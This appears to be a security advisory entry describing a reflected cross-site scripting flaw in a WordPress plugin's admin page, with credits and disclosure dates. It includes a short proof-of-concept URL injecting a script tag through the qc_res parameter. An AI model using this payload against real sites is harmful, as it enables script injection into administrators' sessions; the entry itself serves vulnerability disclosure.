The plugin does not escape the qc_res parameter before outputting it back in the JS code of an admin page, leading to a Reflected Cross-Site Scripting
As admin, enter the following payload in the Domain Key setting of the plugin: </script><script> Then open https://example.com/wp-admin/admin.php?page=litespeed-general&qc_res=</script><script>alert(/XSS/)</script>&domain_hash=541a0e1df04a2a5b7e4bd3472ff596cc
Emil Kylander
Emil Kylander
Yes
2021-11-30 (about 1 years ago)
2021-11-30 (about 1 years ago)
2022-04-09 (about 1 years ago)